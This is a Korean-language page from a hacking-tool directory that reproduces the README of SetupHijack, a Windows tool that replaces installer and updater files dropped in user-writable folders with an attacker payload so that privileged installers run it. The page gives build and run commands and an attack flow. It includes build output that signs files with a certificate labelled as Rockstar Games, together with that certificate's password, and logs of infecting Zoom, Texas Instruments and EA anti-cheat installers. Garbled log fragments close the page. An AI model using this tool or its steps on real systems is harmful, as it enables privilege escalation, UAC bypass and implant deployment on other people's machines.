Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SetupHijack — SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes. | Kitploit
도구/GitHubGitHub/hackerhouse-opensource/setuphijack
Privilege EscalationPayload GenerationExploitationLateral MovementPenetration TestingRed Teaming
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes.

저장소 보기
264296개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SetupHijack


개요

SetupHijack은 Windows 설치 프로그램 및 업데이트 프로세스에서 경쟁 조건과 안전하지 않은 파일 처리를 악용하는 보안 연구 도구입니다. 권한 있는 설치 프로그램 또는 업데이터가 %TEMP% 또는 다른 전역 쓰기 가능 위치에 파일을 드롭하면, 공격자가 이러한 파일을 상승된 권한으로 실행되기 전에 교체할 수 있는 시나리오를 대상으로 합니다.

  • 실행하는 데 상승된 권한이 필요하지 않습니다.
  • 파일 시스템 알림을 사용하지 않습니다 (대신 변경 사항을 폴링합니다).
  • Authenticode 코드 서명 및 설치 프로그램 신뢰 모델의 취약점을 악용합니다.
  • .exe, .msi 및 배치 파일(예: sysinfo, netstat, ipconfig)을 감염시킬 수 있습니다.
  • 레드 팀, 침투 테스트 및 보안 연구 목적으로만 설계되었습니다.

이 도구의 의도된 사용은 손상된 사용자 계정에서 백그라운드로 실행되어 설치 프로그램/업데이터 파일 드롭을 하이재킹하여 다른 프로세스를 상승시키는 것입니다.

아래 차트는 UAC 우회에 사용될 수 있는 여러 시나리오에서 이 취약점의 실제 사용 사례를 보여줍니다. UAC 우회는 Adminless 모드에서 실행될 때 보안 경계로 간주되며 보안 제어를 비활성화하기 위한 일반적인 "공격자 요구 사항"입니다. 권한 있는 관리자 작업을 악용하면 악성 코드가 측면 로드되거나 프로세스 권한을 상승시킬 수 있는 일반적인 취약점 접근성을 제공합니다. 이 도구는 동일한 유형의 위험에 노출된 추가 애플리케이션을 식별하는 데 사용될 수 있으며, 공격자는 사용자 행동을 방해하지 않고 상승된 권한을 얻기 위해 이러한 프로세스의 실행을 기다릴 수 있습니다.

SetupHijack 취약점 발견 차트

작동 방식

  1. SetupHijack은 %TEMP%(및 하위 디렉토리)에서 새롭거나 수정된 설치 프로그램 파일을 지속적으로 스캔합니다.
  2. 대상 파일이 감지되면 사용자가 제공한 페이로드(EXE, MSI 또는 BAT)로 교체되며, 원본 파일을 선택적으로 .bak 파일로 보존합니다.
  3. 권한 있는 프로세스가 무결성 검사 전에 교체된 파일을 실행하면 페이로드가 상승된 권한(예: SYSTEM 또는 Administrator)으로 실행됩니다.
  4. 도구는 모든 작업을 기록하고 동일한 파일에 재감염되지 않도록 건너뛰기 목록을 유지합니다.

코드 서명 참고 사항

이 프로젝트는 페이로드 및 설치 프로그램에 서명하기 위해 SignToolEx.exe 및 SignToolExHook.dll을 사용하는 해킹된 코드 서명 프로세스를 사용합니다. 유효한 코드 서명 인증서와 Authenticode 타임스탬프를 사용하면 설치 프로그램 및 OS 신뢰 검사를 우회할 때 성공률이 높아집니다.


사용법

빌드```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### 실행 (옵션)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • 권한 있는 설치/업데이트 프로세스 전이나 중에 SetupHijack.exe를 실행합니다.
  • 기본적으로 이 도구는 모든 일반적인 드롭 위치(%TEMP%, %APPDATA%, %USERPROFILE%\Downloads)를 스캔합니다.
  • -notemp, -noappdata, -nodownloads 플래그로 특정 위치를 비활성화할 수 있습니다.
  • clean 플래그는 활성화된 모든 위치의 백업을 복원합니다. verbose 플래그는 모든 작업을 기록합니다.
  • 원격 권한 상승을 위해 Terminal Services에서 shadow.exe 또는 유사한 도구와 함께 사용하세요.

예제 공격 흐름

  1. 페이로드와 SetupHijack을 빌드하세요: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. SetupHijack 시작: ```sh SetupHijack.exe
    root@kitploit:~
  3. 관리자 권한으로 대상 설치 프로그램 또는 업데이트 프로세스를 실행합니다.
  4. 설치 프로그램이 %TEMP%에 파일을 드롭하고 높은 권한으로 실행하는 경우, 페이로드가 대체되어 실행됩니다.

예제 출력

다음은 SetupHijack을 빌드하고 실행하는 실제 예제이며, 코드 서명 및 감염 결과를 포함합니다.``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## 임플란트 배포를 위한 사용 예시

아래는 SetupHijack이 동작 중인 모습을 보여주는 스크린샷으로, 권한 있는 설치 프로그램 실행 중에 임플란트를 배포합니다.

![Example Use to Deploy An Implant](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## 보안 참고사항

- 이 도구는 승인된 테스트 및 연구 목적으로만 사용해야 합니다.
- 이러한 취약점을 악용하면 사용자가 관리자 그룹에 속한 경우 완전한 SYSTEM 권한 탈취로 이어질 수 있습니다.
- 설치 프로그램은 해시/서명 검사를 사용하여 이 공격을 차단할 수 있지만, 여전히 많은 프로그램이 그렇지 않습니다.
- 항상 통제된 환경에서 사용하십시오.
- 이 도구로 CVE를 발견하거나 버그 바운티를 받으셨다면, 저희를 인정해 주세요!

한 번에 단일 디렉토리(예: `%TEMP%`)를 타겟팅하면 시간-생성/시간-사용(TOCTOU) 경쟁 조건에서 승리할 가능성을 높일 수 있습니다. 더 빠른 폴링과 적은 경합을 허용하기 때문입니다. 최대 신뢰성을 위해 각각 단일 디렉토리에 집중하는 여러 인스턴스의 SetupHijack을 실행하십시오. 최적의 결과를 위해, 페이로드(높은 권한으로 실행하려는 EXE)에는 상승 요청(requireAdministrator) 매니페스트가 포함되고 유효한 코드 서명 인증서( Authenticode 타임스탬프 포함)로 서명되어 있는지 확인하십시오. 이렇게 하면 설치 프로그램 및 OS의 신뢰 검사를 우회할 가능성이 높아집니다.

## 식별된 취약점

다음은 완전하지 않은 목록으로, 신뢰할 수 없는 .MSI를 실행하여 'NT AUTHORITY\SYSTEM'을 얻는 '최적 시나리오'에서 식별되었습니다. 그러나 많은 'UAC 상승' 프로세스는 종종 .bat 파일을 통해 실행됩니다. 실행은 동일한 USER SID 아래에서 발생하므로, %TEMP%는 %USERPROFILE% 아래에 있는 USER SID에 고유하며 내부 세션 생성의 일부로 생성됩니다. 따라서 동일 세션 명령 내에서 .bat 파일을 조작하여 상위 프로세스 권한을 상속받아 높은 무결성의 전체 권한으로 상승할 수 있습니다. '임시 파일 상승 명령 실행'은 일반적인 발견 사항이며, 보안 데스크톱에서 사용자 프롬프트가 발생할 때 관리자 없이 UAC 우회 및 실행에 사용될 수 있습니다(예: Zoom 업데이트에서 악용된 애플리케이션 표시).

- Zoom 6.6.1 (15968)은 .exe 설치 및 업데이트에 %AppData%를 사용하여 측면 프로세스 이동 및 프로세스 스푸핑(예: Zoom 업데이트에서 상승 요청 전송)을 허용합니다. 실행 파일은 쉽게 조작되어 자격 증명 탈취 공격 및 악의적인 목적에 사용될 수 있습니다.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe가 install.msi를 실행할 때 NT AUTHORITY\SYSTEM으로 실행됩니다.

  • Wireshark 업데이트 exe는 %Temp%를 통해 들어오며, 경쟁 조건을 이기지 못했습니다.

  • Visual Studio 코드 서명 검사는 업데이트 시 악용을 방지합니다 (약하게 테스트된 .VSIX).

  • Texas Instrument Code Composer 설치 프로그램은 UAC 인증 우회에 악용될 수 있습니다 (2025년 9월 25일). (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- Cursor IDE가 %TEMP%에 .bat 파일과 명령 기록을 생성하는 것이 관찰되었으며, 이는 Cursor 기록에 명령을 주입하는 데 악용될 수 있습니다. (상승 제한적)


- JBL Quantum Engine에는 (현재 패치된) 명령 주입 취약점이 있으며, 이는 JBL_QuantumENGINE_1.11.0.1511_x64가 실행된 동일한 디렉토리에서 "net"(.bat 포함)을 실행합니다. 최신 버전은 이 특정 명령 주입 취약점에 취약하지 않은 새로운 설치 프로그램(JBL_QuantumENGINE_Installer_2.2.13_x64.exe)을 사용합니다. 이 문제는 2022년 11월에 0day로 발견되었습니다. UAC 제한을 우회하고 관리자 권한을 상승시키는 데 사용될 수 있습니다. SYSTEM 서비스는 디버깅/진단을 위해 %TEMP% 아래에 bat 파일을 씁니다. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "EA Anti-Cheat Installer" 임의 상승 명령 실행. EA 타이틀 중 "skate." 같은 게임은 임시적이고 사용자가 쓸 수 있는 위치를 사용하는 안티치트 서비스를 설치합니다. 공격자는 STEAM 설치 중 EAAntiCheat.Installer.exe를 교체할 수 있으며, STEAM 엔진에서 UAC 상승 프롬프트가 Valve 로고와 아이콘으로 표시되지만, 페이로드 exe를 상승된 권한으로 실행합니다. UAC 우회(혼동?) 공격에 사용하려면 EASkateUAC 스크린샷을 참조하세요.``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# 라이선스

이 파일들은 3-clause BSD license 하에 제공됩니다.
도구 다운로드
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS